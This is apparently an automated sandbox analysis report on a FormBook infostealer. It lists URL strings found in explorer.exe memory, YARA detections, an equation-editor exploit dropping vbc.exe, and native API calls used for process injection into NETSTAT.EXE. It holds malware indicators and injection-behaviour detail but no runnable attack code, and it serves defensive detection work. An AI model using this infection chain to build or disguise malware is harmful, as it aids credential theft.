              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
              Source: explorer.exe, 00000007.00000000.2200795359.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: explorer.exe, 00000007.00000000.2200795359.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
              Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

              E-Banking Fraud:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              .NET source code contains very large stringsShow sources
              Source: svchost[1].2.dr, frmRazor.csLong String: Length: 13656
              Source: 4.2.vbc.exe.cf0000.2.unpack, frmRazor.csLong String: Length: 13656
              Source: 4.0.vbc.exe.cf0000.0.unpack, frmRazor.csLong String: Length: 13656
              Source: 5.0.vbc.exe.cf0000.0.unpack, frmRazor.csLong String: Length: 13656
              Source: 5.2.vbc.exe.cf0000.0.unpack, frmRazor.csLong String: Length: 13656
              Source: 6.0.vbc.exe.cf0000.0.unpack, frmRazor.csLong String: Length: 13656
              Source: 6.2.vbc.exe.cf0000.4.unpack, frmRazor.csLong String: Length: 13656
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]Jump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419D60 NtCreateFile,6_2_00419D60
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E10 NtReadFile,6_2_00419E10
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E90 NtClose,6_2_00419E90
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419F40 NtAllocateVirtualMemory,6_2_00419F40
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419D62 NtCreateFile,6_2_00419D62
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419D1C NtCreateFile,6_2_00419D1C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419DB2 NtReadFile,6_2_00419DB2
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E0A NtReadFile,6_2_00419E0A
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009500C4 NtCreateFile,LdrInitializeThunk,6_2_009500C4
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00950048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00950048
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00950078 NtResumeThread,LdrInitializeThunk,6_2_00950078
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094F9F0 NtClose,LdrInitializeThunk,6_2_0094F9F0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094F900 NtReadFile,LdrInitializeThunk,6_2_0094F900
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0094FAD0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0094FAE8
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_0094FBB8
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0094FB68
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_0094FC90
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_0094FC60
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FD8C NtDelayExecution,LdrInitializeThunk,6_2_0094FD8C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0094FDC0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_0094FEA0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0094FED0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FFB4 NtCreateSection,LdrInitializeThunk,6_2_0094FFB4
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009510D0 NtOpenProcessToken,6_2_009510D0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00950060 NtQuerySection,6_2_00950060
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009501D4 NtSetValueKey,6_2_009501D4
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0095010C NtOpenDirectoryObject,6_2_0095010C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00951148 NtOpenThread,6_2_00951148
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009507AC NtCreateMutant,6_2_009507AC
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094F8CC NtWaitForSingleObject,6_2_0094F8CC
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00951930 NtSetContextThread,6_2_00951930
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094F938 NtWriteFile,6_2_0094F938
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FAB8 NtQueryValueKey,6_2_0094FAB8
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FA20 NtQueryInformationFile,6_2_0094FA20
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FA50 NtEnumerateValueKey,6_2_0094FA50
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FBE8 NtQueryVirtualMemory,6_2_0094FBE8
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FB50 NtCreateKey,6_2_0094FB50
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FC30 NtOpenProcess,6_2_0094FC30
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00950C40 NtGetContextThread,6_2_00950C40
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FC48 NtSetInformationFile,6_2_0094FC48
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00951D80 NtSuspendThread,6_2_00951D80
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FD5C NtEnumerateKey,6_2_0094FD5C
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FE24 NtWriteVirtualMemory,6_2_0094FE24
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FFFC NtCreateProcessEx,6_2_0094FFFC
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0094FF34 NtQueueApcThread,6_2_0094FF34
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,6_2_003D9862
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9DAE NtResumeThread,NtClose,6_2_003D9DAE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D00C4 NtCreateFile,LdrInitializeThunk,8_2_021D00C4
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D07AC NtCreateMutant,LdrInitializeThunk,8_2_021D07AC
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFAB8 NtQueryValueKey,LdrInitializeThunk,8_2_021CFAB8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_021CFAD0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_021CFAE8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFB50 NtCreateKey,LdrInitializeThunk,8_2_021CFB50
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_021CFB68
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_021CFBB8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CF900 NtReadFile,LdrInitializeThunk,8_2_021CF900
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CF9F0 NtClose,LdrInitializeThunk,8_2_021CF9F0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_021CFED0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFFB4 NtCreateSection,LdrInitializeThunk,8_2_021CFFB4
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFC60 NtMapViewOfSection,LdrInitializeThunk,8_2_021CFC60
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFD8C NtDelayExecution,LdrInitializeThunk,8_2_021CFD8C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_021CFDC0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D0048 NtProtectVirtualMemory,8_2_021D0048
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D0078 NtResumeThread,8_2_021D0078
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D0060 NtQuerySection,8_2_021D0060
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D10D0 NtOpenProcessToken,8_2_021D10D0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D010C NtOpenDirectoryObject,8_2_021D010C
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D1148 NtOpenThread,8_2_021D1148
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021D01D4 NtSetValueKey,8_2_021D01D4
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFA20 NtQueryInformationFile,8_2_021CFA20
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFA50 NtEnumerateValueKey,8_2_021CFA50
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CFBE8 NtQueryVirtualMemory,8_2_021CFBE8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021CF8CC NtWaitForSingleObject,8_2_021CF8CC
